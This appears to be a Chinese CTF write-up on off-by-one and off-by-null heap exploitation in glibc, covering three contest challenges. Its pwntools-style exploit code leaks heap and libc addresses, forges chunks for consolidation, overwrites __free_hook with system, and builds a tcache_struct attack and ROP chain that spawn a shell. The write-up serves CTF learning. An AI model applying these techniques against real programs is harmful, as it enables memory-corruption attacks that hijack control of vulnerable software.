Off-by-One漏洞利用技术详解<\/h1>

背景知识<\/h2>

Off-by-one漏洞是指由于边界条件验证不严格，导致向缓冲区写入数据时多写入一个字节的情况。在CTF比赛中常见的三种溢出方式：<\/p>

strcpy函数导致的溢出<\/strong>：当复制数据长度等于缓冲区最大容量时，strcpy会在结尾额外写入一个'\x00'字节<\/li>
循环写入控制不当<\/strong>：循环次数计算错误导致多写入一个字节<\/li>

故意设计的漏洞<\/strong>：如size+1 <= max_content_size<\/code>这样的条件判断<\/li> <\/ol> 内部赛题目分析<\/h2> 环境信息<\/h3> glibc 2.31<\/li> 无UAF漏洞<\/li> 限制申请大小在0x100以内<\/li> <\/ul> 漏洞点分析<\/h3> edit_read<\/code>函数中存在off-by-null漏洞<\/li> 通过read(0, a1, 1)<\/code>逐字节读取，直到遇到换行符<\/li> 将换行符替换为'\x00'时可能导致溢出<\/li> <\/ol> 利用思路<\/h3> 利用off-by-null在unsorted bin中实现chunk合并<\/li> 修改fd指针实现任意地址写<\/li> 最终目标是执行system('\/bin\/sh')<\/code><\/li> <\/ol> 详细利用流程<\/h3> 泄露堆地址<\/strong>：<\/li> <\/ol> add(0<\/span>,0xf8<\/span>,'aaaa'<\/span>) <\/span><\/span>add(1<\/span>,0xf8<\/span>,'aaaa'<\/span>) <\/span><\/span>delete(1<\/span>) <\/span><\/span>delete(0<\/span>) <\/span><\/span>add(1<\/span>,0xf8<\/span>,''<\/span>) <\/span><\/span>show(1<\/span>) <\/span><\/span>heap_base =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>,'<\/span>\x00<\/span>'<\/span>))-<\/span>0x30a<\/span> <\/span><\/span><\/code><\/pre> 布置堆布局<\/strong>：<\/li> <\/ol> for<\/span> i in<\/span> range(11<\/span>): <\/span><\/span> add(i,0xf8<\/span>,''<\/span>) <\/span><\/span>for<\/span> i in<\/span> range(7<\/span>): <\/span><\/span> delete(i) <\/span><\/span>delete(9<\/span>) <\/span><\/span><\/code><\/pre> 泄露libc地址<\/strong>：<\/li> <\/ol> add(11<\/span>,0x10<\/span>,''<\/span>) <\/span><\/span>show(11<\/span>) <\/span><\/span>libc_base =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>,'<\/span>\x00<\/span>'<\/span>))-<\/span>0x1ecc0a<\/span> <\/span><\/span><\/code><\/pre> 伪造chunk实现合并<\/strong>：<\/li> <\/ol> pl =<\/span> p64(0<\/span>)+<\/span>p64(0xf1<\/span>)+<\/span>p64(heap_base+<\/span>0x9a0<\/span>)+<\/span>p64(heap_base+<\/span>0x9a0<\/span>) <\/span><\/span>pl =<\/span> pl.<\/span>ljust(0xf0<\/span>,'<\/span>\x00<\/span>'<\/span>) <\/span><\/span>pl +=<\/span> p64(0xf0<\/span>) <\/span><\/span>edit(7<\/span>,pl) <\/span><\/span>delete(8<\/span>) <\/span><\/span><\/code><\/pre> 修改fd指针<\/strong>：<\/li> <\/ol> for<\/span> i in<\/span> range(7<\/span>): <\/span><\/span> add(i,0xf8<\/span>,''<\/span>) <\/span><\/span>add(9<\/span>,0xf8<\/span>,''<\/span>) <\/span><\/span>delete(1<\/span>) <\/span><\/span>delete(9<\/span>) <\/span><\/span>pl =<\/span> p64(0<\/span>)+<\/span>p64(0x100<\/span>)+<\/span>p64(free_hook) <\/span><\/span>edit(7<\/span>,pl) <\/span><\/span><\/code><\/pre> 最终利用<\/strong>：<\/li> <\/ol> add(1<\/span>,0xf8<\/span>,'\/bin\/sh<\/span>\x00<\/span>'<\/span>) <\/span><\/span>add(9<\/span>,0xf8<\/span>,p64(system)) <\/span><\/span>delete(1<\/span>) # 触发free_hook执行system<\/span> <\/span><\/span><\/code><\/pre>ISCC线下赛-私地题目分析<\/h2> 环境信息<\/h3> glibc 2.23<\/li> 存在chunk overlapping问题<\/li> <\/ul> 漏洞点分析<\/h3> edit_user<\/code>函数中存在off-by-one漏洞<\/li> 读取用户名时使用read_input(*(*(&heaparray + v1) + 8LL), **(&heaparray + v1) + 1LL)<\/code><\/li> 可以多写入一个字节<\/li> <\/ol> 利用思路<\/h3> 利用off-by-one修改chunk size<\/li> 通过chunk overlapping实现任意地址写<\/li> 修改free_hook为system<\/li> <\/ol> 详细利用流程<\/h3> 准备\/bin\/sh字符串<\/strong>：<\/li> <\/ol> add(0x10<\/span>,'\/bin\/sh<\/span>\x00<\/span>'<\/span>) <\/span><\/span><\/code><\/pre> 泄露libc地址<\/strong>：<\/li> <\/ol> add(0x88<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x18<\/span>,'aaaa'<\/span>) <\/span><\/span>delete(1<\/span>) <\/span><\/span>add(0x88<\/span>,'a'<\/span>*<\/span>8<\/span>) <\/span><\/span>show(1<\/span>) <\/span><\/span>libc_base =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>,'<\/span>\x00<\/span>'<\/span>))-<\/span>0x3c4b0a<\/span> <\/span><\/span><\/code><\/pre> 利用off-by-one修改chunk size<\/strong>：<\/li> <\/ol> add(0x18<\/span>,''<\/span>) <\/span><\/span>add(0x18<\/span>,''<\/span>) <\/span><\/span>add(0x18<\/span>,''<\/span>) <\/span><\/span>add(0x18<\/span>,''<\/span>) <\/span><\/span>edit(2<\/span>,p64(0<\/span>)*<\/span>3<\/span>+<\/span>p8(0x81<\/span>)) <\/span><\/span>delete(3<\/span>) <\/span><\/span><\/code><\/pre> 实现任意地址写<\/strong>：<\/li> <\/ol> add(0x70<\/span>,p64(0<\/span>)*<\/span>8<\/span>+<\/span>p64(0x10<\/span>)+<\/span>p64(free_hook)) <\/span><\/span>edit(4<\/span>,p64(system)) <\/span><\/span>delete(0<\/span>) # 触发free_hook<\/span> <\/span><\/span><\/code><\/pre>鹏城杯-babyheap题目分析<\/h2> 环境信息<\/h3> glibc 2.38<\/li> 需要结合IO_leak和tcache_struct攻击<\/li> <\/ul> 漏洞点分析<\/h3> sub_13BE<\/code>函数中存在off-by-null漏洞<\/li> 读取时会在末尾写入'\x00'<\/li> <\/ol> 利用思路<\/h3> 利用off-by-null修改chunk元数据<\/li> 结合IO_leak泄露栈地址<\/li> 通过tcache_struct攻击实现ROP<\/li> <\/ol> 详细利用流程<\/h3> 泄露堆地址<\/strong>：<\/li> <\/ol> heap_base =<\/span> int(r(14<\/span>),16<\/span>)-<\/span>0x2a0<\/span> <\/span><\/span><\/code><\/pre> 初始堆布局<\/strong>：<\/li> <\/ol> add(0x418<\/span>,p64(0<\/span>)+<\/span>p64(0x1880<\/span>)+<\/span>p64(heap_base+<\/span>0x2c0<\/span>)+<\/span>p64(heap_base+<\/span>0x2c0<\/span>)) <\/span><\/span>add(0x408<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x408<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x408<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x418<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x418<\/span>,'aaaa'<\/span>) <\/span><\/span>add(0x4f8<\/span>,'bbbb'<\/span>) <\/span><\/span>add(0x4f8<\/span>,'bbbb'<\/span>) <\/span><\/span><\/code><\/pre> 利用off-by-null<\/strong>：<\/li> <\/ol> edit(5<\/span>,0x418<\/span>,'a'<\/span>*<\/span>0x410<\/span>+<\/span>p64(0x1880<\/span>)) <\/span><\/span>delete(6<\/span>) <\/span><\/span><\/code><\/pre> 泄露libc地址<\/strong>：<\/li> <\/ol> add(0x408<\/span>,'cccc'<\/span>) <\/span><\/span>add(0x488<\/span>,'cccc'<\/span>) <\/span><\/span>add(0x488<\/span>,'cccc'<\/span>) <\/span><\/span>delete(8<\/span>) <\/span><\/span>add(0x498<\/span>,'dddd'<\/span>) <\/span><\/span>show(1<\/span>) <\/span><\/span>libc_base =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>,'<\/span>\x00<\/span>'<\/span>))-<\/span>0x1ff0f0<\/span>-<\/span>0x20<\/span> <\/span><\/span><\/code><\/pre> tcache_struct攻击<\/strong>：<\/li> <\/ol> pl =<\/span> 'a'<\/span>*<\/span>0x380<\/span>+<\/span>p64(0<\/span>)+<\/span>p64(0x411<\/span>)+<\/span>p64((heap_base+<\/span>0x10<\/span>)^<\/span>(heap_base>><\/span>12<\/span>)) <\/span><\/span>edit(9<\/span>,0x400<\/span>,pl) <\/span><\/span>add(0x408<\/span>,'aaaa'<\/span>) <\/span><\/span>pl =<\/span> p64(0x1<\/span>)+<\/span>p64(0<\/span>)*<\/span>14<\/span>+<\/span>p64(0x0007000000000000<\/span>)+<\/span>p64(0<\/span>)*<\/span>0x3f<\/span>+<\/span>p64(stdout) <\/span><\/span>add(0x408<\/span>,pl) <\/span><\/span><\/code><\/pre> 泄露栈地址<\/strong>：<\/li> <\/ol> ru('<\/span>\n<\/span>'<\/span>) <\/span><\/span>stack =<\/span> u64(p.<\/span>recvuntil('<\/span>\x7f<\/span>'<\/span>).<\/span>ljust(8<\/span>,'<\/span>\x00<\/span>'<\/span>))-<\/span>0x120<\/span> <\/span><\/span><\/code><\/pre> ROP利用<\/strong>：<\/li> <\/ol> pl =<\/span> p64(0x1<\/span>)+<\/span>p64(0<\/span>)*<\/span>14<\/span>+<\/span>p64(0x0007000000000000<\/span>)+<\/span>p64(0<\/span>)*<\/span>0x3f<\/span>+<\/span>p64(stack-<\/span>0x8<\/span>) <\/span><\/span>edit(3<\/span>,0x408<\/span>,pl) <\/span><\/span>pl =<\/span> p64(0<\/span>)+<\/span>p64(ret)+<\/span>p64(pop_rdi)+<\/span>p64(bin_sh)+<\/span>p64(system) <\/span><\/span>add(0x400<\/span>,pl) <\/span><\/span>menu(5<\/span>) # 退出触发ROP<\/span> <\/span><\/span><\/code><\/pre>总结<\/h2> 不同glibc版本的利用差异<\/strong>：<\/p> 2.23：可以直接利用unsorted bin合并<\/li> 2.31：需要更复杂的堆布局<\/li> 2.38：需要结合新的攻击技术如tcache_struct攻击<\/li> <\/ul> <\/li> 关键技巧<\/strong>：<\/p> 精确控制堆布局<\/li> 利用off-by-one修改关键元数据<\/li> 结合其他泄露技术获取必要信息<\/li> 根据环境选择合适的攻击路径<\/li> <\/ul> <\/li> 防御绕过<\/strong>：<\/p> 针对不同保护机制(如tcache)调整利用方式<\/li> 利用IO_file结构体泄露信息<\/li> 在更高版本中使用ROP等技术绕过保护<\/li> <\/ul> <\/li> <\/ol>